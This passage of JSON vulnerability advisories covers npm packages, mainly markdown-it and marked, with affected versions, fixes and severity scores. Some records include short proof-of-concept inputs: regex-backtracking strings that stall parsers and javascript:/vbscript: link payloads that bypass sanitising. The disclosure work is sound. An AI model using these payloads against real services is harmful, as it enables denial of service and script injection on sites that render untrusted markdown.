"https://github.com/lodash/lodash/commit/5c08f18d365b64063bfbfa686cbb97cdd6267347" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/wiki/Changelog" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-1010266.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190919-0004" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-73639" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-07-19T16:11:26Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6vfc-qv3f-vr6c", "published": "2022-01-12T22:20:22Z", "modified": "2023-11-08T04:08:07.059316Z", "aliases": [ "CVE-2022-21670" ], "summary": "Uncontrolled Resource Consumption in markdown-it", "details": "### Impact\n\nSpecial patterns with length \u003e 50K chars can slow down parser significantly.\n\n```js\nconst md = require('markdown-it')();\n\nmd.render(`x ${' '.repeat(150000)} x \\nx`);\n```\n\n\n### Patches\n\nUpgrade to v12.3.2+\n\n### Workarounds\n\nNo.\n\n### References\n\nFix + test sample: https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101\n", "affected": [ { "package": { "name": "markdown-it", "ecosystem": "npm", "purl": "pkg:npm/markdown-it" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "12.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-6vfc-qv3f-vr6c/GHSA-6vfc-qv3f-vr6c.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c" }, { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2022-21670" }, { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101" }, { "type": "PACKAGE", "url": "https://github.com/markdown-it/markdown-it" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-01-10T21:50:05Z", "nvd_published_at": "2022-01-10T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j5p7-jf4q-742q", "published": "2022-12-27T09:30:41Z", "modified": "2023-11-08T03:57:48.904226Z", "aliases": [ "CVE-2015-10005" ], "summary": "markdown-it vulnerable to Inefficient Regular Expression Complexity", "details": "A vulnerability was found in markdown-it up to 2.x. It has been classified as problematic. Affected is an unknown function of the file `lib/common/html_re.js`. The manipulation leads to inefficient regular expression complexity. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is 89c8620157d6e38f9872811620d25138fc9d1b0d. It is recommended to upgrade the affected component. 
The identifier of this vulnerability is VDB-216852.", "affected": [ { "package": { "name": "markdown-it", "ecosystem": "npm", "purl": "pkg:npm/markdown-it" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-j5p7-jf4q-742q/GHSA-j5p7-jf4q-742q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10005" }, { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/commit/89c8620157d6e38f9872811620d25138fc9d1b0d" }, { "type": "PACKAGE", "url": "https://github.com/markdown-it/markdown-it" }, { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/releases/tag/3.0.0" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.216852" }, { "type": "WEB", "url": "https://vuldb.com/?id.216852" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2022-12-30T16:27:08Z", "nvd_published_at": "2022-12-27T09:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4r62-v4vq-hr96", "published": "2021-02-08T21:17:58Z", "modified": "2023-11-08T04:04:40.912168Z", "aliases": [ "CVE-2021-21306" ], "related": [ "CVE-2021-21306" ], "summary": "Regular Expression Denial of Service (REDoS) in Marked", "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\n[Regular expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n\nA Denial of Service attack can affect anyone who runs user generated code through `marked`.\n\n### Patches\n_Has the problem been patched? 
What versions should users upgrade to?_\n\npatched in v2.0.0\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nNone.\n\n### References\n_Are there any links users can visit to find out more?_\n\nhttps://github.com/markedjs/marked/issues/1927\nhttps://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [marked](https://github.com/markedjs/marked/issues)", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.1.1" }, { "fixed": "2.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-4r62-v4vq-hr96/GHSA-4r62-v4vq-hr96.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markedjs/marked/security/advisories/GHSA-4r62-v4vq-hr96" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21306" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/issues/1927" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/pull/1864" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/7293251c438e3ee968970f7609f1a27f9007bccd" }, { "type": "WEB", "url": "https://www.npmjs.com/package/marked" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-02-08T21:17:26Z", "nvd_published_at": "2021-02-08T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5v2h-r2cx-5xgj", "published": "2022-01-14T21:04:46Z", "modified": "2023-11-08T04:08:07.532717Z", "aliases": [ "CVE-2022-21681" ], "summary": "Inefficient Regular Expression Complexity in marked", "details": "### 
Impact\n\n_What kind of vulnerability is it?_\n\nDenial of service.\n\nThe regular expression `inline.reflinkSearch` may cause catastrophic backtracking against some strings.\nPoC is the following.\n\n```javascript\nimport * as marked from 'marked';\n\nconsole.log(marked.parse(`[x]: x\n\n\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](`));\n```\n\n_Who is impacted?_\n\nAnyone who runs untrusted markdown through marked and does not use a worker with a time limit.\n\n### Patches\n\n_Has the problem been patched?_\n\nYes\n\n_What versions should users upgrade to?_\n\n4.0.10\n\n### Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nDo not run untrusted markdown through marked or run marked on a [worker](https://marked.js.org/using_advanced#workers) thread and set a reasonable time limit to prevent draining resources.\n\n### References\n\n_Are there any links users can visit to find out more?_\n\n- https://marked.js.org/using_advanced#workers\n- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [marked](https://github.com/markedjs/marked)\n", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-5v2h-r2cx-5xgj/GHSA-5v2h-r2cx-5xgj.json" } } ], "references": [ { "type": "WEB", "url": 
"https://github.com/markedjs/marked/security/advisories/GHSA-5v2h-r2cx-5xgj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21681" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/8f806573a3f6c6b7a39b8cdb66ab5ebb8d55a5f5" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/c4a3ccd344b6929afa8a1d50ac54a721e57012c0" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AIXDMC3CSHYW3YWVSQOXAWLUYQHAO5UX" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2022-01-14T19:57:17Z", "nvd_published_at": "2022-01-14T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7px7-7xjx-hxm8", "published": "2018-01-04T21:04:19Z", "modified": "2023-11-08T03:58:46.365782Z", "aliases": [ "CVE-2017-1000427" ], "summary": "Marked vulnerable to XSS from data URIs", "details": "marked version 0.3.6 and earlier is vulnerable to an XSS attack in the data: URI parser.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-7px7-7xjx-hxm8/GHSA-7px7-7xjx-hxm8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000427" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-7px7-7xjx-hxm8" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BO2RMVVZVV6NFTU46B5RYRK7ZCXYARZS" 
}, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M6BJG6RGDH7ZWVVAUFBFI5L32RSMQN2S" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:marked:20170112" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:23:14Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9cw2-jqp5-7x39", "published": "2020-08-31T22:52:52Z", "modified": "2023-11-08T03:57:41.045132Z", "aliases": [ "CVE-2014-3743" ], "summary": "Multiple Content Injection Vulnerabilities in marked", "details": "Versions 0.3.0 and earlier of `marked` are affected by two cross-site scripting vulnerabilities, even when `sanitize: true` is set.\n\nThe attack vectors for this vulnerability are GFM Codeblocks and JavaScript URLs.\n\n\n## Recommendation\n\nUpgrade to version 0.3.1 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.3.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/08/GHSA-9cw2-jqp5-7x39/GHSA-9cw2-jqp5-7x39.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1850" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/22" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:08:10Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cfjh-p3g4-3q2f", "published": "2017-10-24T18:33:36Z", "modified": 
"2023-11-08T03:57:49.831117Z", "aliases": [ "CVE-2015-1370" ], "summary": "VBScript Content Injection in marked", "details": "Versions 0.3.2 and earlier of `marked` are affected by a cross-site scripting vulnerability even when `sanitize:true` is set. \n\n## Proof of Concept ( IE10 Compatibility Mode Only )\n\n`[xss link](vbscript:alert(1\u0026#41;)`\n\nwill get a link\n\n`\u003ca href=\"vbscript:alert(1)\"\u003exss link\u003c/a\u003e`\n\n\n## Recommendation\n\nUpdate to version 0.3.3 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-cfjh-p3g4-3q2f/GHSA-cfjh-p3g4-3q2f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1370" }, { "type": "WEB", "url": "https://github.com/chjj/marked/issues/492" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/issues/492" }, { "type": "WEB", "url": "https://github.com/evilpacket/marked/commit/3c191144939107c45a7fa11ab6cb88be6694a1ba" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/fc372d1c6293267722e33f2719d57cebd67b3da1" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/24" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/24/versions" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/01/23/2" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:31:22Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-ch52-vgq2-943f", "published": "2020-09-03T18:15:53Z", "modified": "2020-08-31T18:46:28Z", "summary": "Regular Expression Denial of Service in marked", 
"details": "Affected versions of `marked` are vulnerable to Regular Expression Denial of Service (ReDoS). The `_label` subrule may significantly degrade parsing performance of malformed input.\n\n\n## Recommendation\n\nUpgrade to version 0.7.0 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.4.0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-ch52-vgq2-943f/GHSA-ch52-vgq2-943f.json" } } ], "references": [ { "type": "WEB", "url": "https://www.npmjs.com/advisories/1076" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:46:28Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-hjcp-j389-59ff", "published": "2017-10-24T18:33:36Z", "modified": "2024-02-09T17:50:43Z", "aliases": [ "CVE-2015-8854" ], "summary": "Regular Expression Denial of Service in marked", "details": "Versions 0.3.3 and earlier of `marked` are affected by a regular expression denial of service ( ReDoS ) vulnerability when passed inputs that reach the `em` inline rule.\n\n\n\n## Recommendation\n\nUpdate to version 0.3.4 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-hjcp-j389-59ff/GHSA-hjcp-j389-59ff.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8854" }, { "type": "WEB", "url": "https://github.com/chjj/marked/issues/497" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-hjcp-j389-59ff" }, { "type": "PACKAGE", "url": 
"https://github.com/chjj/marked" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BO2RMVVZVV6NFTU46B5RYRK7ZCXYARZS" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M6BJG6RGDH7ZWVVAUFBFI5L32RSMQN2S" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K05052081?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/23" }, { "type": "WEB", "url": "https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:40:28Z", "nvd_published_at": "2017-01-23T21:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p9wx-2529-fp83", "published": "2025-05-23T15:31:16Z", "modified": "2025-05-27T15:27:40.131270Z", "aliases": [ "CVE-2018-25110" ], "summary": "Marked allows Regular Expression Denial of Service (ReDoS) attacks", "details": "Marked prior to version 0.3.17 is vulnerable to a Regular Expression Denial of Service (ReDoS) attack due to catastrophic backtracking in several regular expressions used for parsing HTML tags and markdown links. 
An attacker can exploit this vulnerability by providing specially crafted markdown input, such as deeply nested or repetitively structured brackets or tag attributes, which cause the parser to hang and lead to a Denial of Service.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.17" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-p9wx-2529-fp83/GHSA-p9wx-2529-fp83.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25110" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/issues/1070" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/pull/1083" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/20bfc106013ed45713a21672ad4a34df94dcd485" }, { "type": "WEB", "url": "https://github.com/Checkmarx/Vulnerabilities-Proofs-of-Concept/tree/main/2018/CVE-2018-25110" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2025-05-27T15:03:47Z", "nvd_published_at": "2025-05-23T15:15:20Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rrrm-qjm4-v8hf", "published": "2022-01-14T21:04:41Z", "modified": "2023-11-08T04:08:07.472715Z", "aliases": [ "CVE-2022-21680" ], "summary": "Inefficient Regular Expression Complexity in marked", "details": "### Impact\n\n_What kind of vulnerability is it?_\n\nDenial of service.\n\nThe regular expression `block.def` may cause catastrophic backtracking against some strings.\nPoC is the following.\n\n```javascript\nimport * as marked from \"marked\";\n\nmarked.parse(`[x]:${' '.repeat(1500)}x ${' 
'.repeat(1500)} x`);\n```\n\n_Who is impacted?_\n\nAnyone who runs untrusted markdown through marked and does not use a worker with a time limit.\n\n### Patches\n\n_Has the problem been patched?_\n\nYes\n\n_What versions should users upgrade to?_\n\n4.0.10\n\n### Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nDo not run untrusted markdown through marked or run marked on a [worker](https://marked.js.org/using_advanced#workers) thread and set a reasonable time limit to prevent draining resources.\n\n### References\n\n_Are there any links users can visit to find out more?_\n\n- https://marked.js.org/using_advanced#workers\n- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [marked](https://github.com/markedjs/marked)\n", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-rrrm-qjm4-v8hf/GHSA-rrrm-qjm4-v8hf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markedjs/marked/security/advisories/GHSA-rrrm-qjm4-v8hf" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21680" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/c4a3ccd344b6929afa8a1d50ac54a721e57012c0" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/releases/tag/v4.0.10" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AIXDMC3CSHYW3YWVSQOXAWLUYQHAO5UX" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], 
"github_reviewed": true, "github_reviewed_at": "2022-01-14T19:56:20Z", "nvd_published_at": "2022-01-14T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vfvf-mqq8-rwqc", "published": "2019-02-18T23:58:20Z", "modified": "2023-11-08T03:58:10.903030Z", "aliases": [ "CVE-2016-10531" ], "summary": "Sanitization bypass using HTML Entities in marked", "details": "Affected versions of `marked` are susceptible to a cross-site scripting vulnerability in link components when `sanitize:true` is configured. \n\n## Proof of Concept\n\nThis flaw exists because link URIs containing HTML entities get processed in an abnormal manner. Any HTML Entities get parsed on a best-effort basis and included in the resulting link, while if that parsing fails that character is omitted.\n\nFor example:\n\nA link URI such as\n```\njavascript\u0026#x58document;alert\u0026#40;1\u0026#41;\n```\nRenders a valid link that when clicked will execute `alert(1)`.\n\n\n## Recommendation\n\nUpdate to version 0.3.6 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.6" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-vfvf-mqq8-rwqc/GHSA-vfvf-mqq8-rwqc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10531" }, { "type": "WEB", "url": "https://github.com/chjj/marked/pull/592" }, { "type": "WEB", "url": "https://github.com/chjj/marked/pull/592/commits/2cff85979be8e7a026a9aca35542c470cf5da523" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vfvf-mqq8-rwqc" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/101" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, 
"github_reviewed_at": "2020-06-16T21:57:38Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x5pg-88wf-qq4p", "published": "2018-07-24T20:10:52Z", "modified": "2023-11-08T03:59:05.647192Z", "aliases": [ "CVE-2017-16114" ], "summary": "Regular Expression Denial of Service in marked", "details": "Affected versions of `marked` are vulnerable to a regular expression denial of service. \n\nThe amplification in this vulnerability is significant, with 1,000 characters resulting in the event loop being blocked for around 6 seconds.\n\n\n## Recommendation\n\nUpdate to version 0.3.9 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/07/GHSA-x5pg-88wf-qq4p/GHSA-x5pg-88wf-qq4p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16114" }, { "type": "WEB", "url": "https://github.com/chjj/marked/issues/937" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-x5pg-88wf-qq4p" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/531" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:02:12Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xf5p-87ch-gxw2", "published": "2019-06-05T14:10:03Z", "modified": "2022-08-02T17:43:57Z", "summary": "Marked ReDoS due to email addresses being evaluated in quadratic time", "details": "Versions of `marked` from 0.3.14 until 0.6.2 are vulnerable to Regular Expression 
Denial of Service. Email addresses may be evaluated in quadratic time, allowing attackers to potentially crash the node process due to resource exhaustion.\n\n\n## Recommendation\n\nUpgrade to version 0.6.2 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.3.14" }, { "fixed": "0.6.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-xf5p-87ch-gxw2/GHSA-xf5p-87ch-gxw2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markedjs/marked/pull/1460" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/b15e42b67cec9ded8505e9d68bb8741ad7a9590d" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/releases/tag/v0.6.2" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-MARKED-174116" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/812" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-05T13:50:35Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4xcv-9jjx-gfj3", "published": "2019-07-05T21:07:58Z", "modified": "2021-08-17T15:44:45Z", "summary": "Denial of Service in mem", "details": "Versions of `mem` prior to 4.0.0 are vulnerable to Denial of Service (DoS). The package fails to remove old values from the cache even after a value passes its `maxAge` property. 
This may allow attackers to exhaust the system's memory if they are able to abuse the application logging.\n\n\n## Recommendation\n\nUpgrade to version 4.0.0 or later.", "affected": [ { "package": { "name": "mem", "ecosystem": "npm", "purl": "pkg:npm/mem" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-4xcv-9jjx-gfj3/GHSA-4xcv-9jjx-gfj3.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/sindresorhus/mem/commit/da4e4398cb27b602de3bd55f746efa9b4a31702b" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1623744" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:mem:20180117" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1084" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-07-03T20:52:42Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-952p-6rrq-rcjv", "published": "2024-05-14T18:30:54Z", "modified": "2024-08-28T13:12:26Z", "aliases": [ "CVE-2024-4067" ], "related": [ "CGA-6q83-777j-gp5r", "CGA-7j2f-jxvw-gx52", "CGA-9hv5-rmvp-37vw", "CGA-9qj8-ph43-6pq5" ], "summary": "Regular Expression Denial of Service (ReDoS) in micromatch", "details": "The NPM package `micromatch` prior 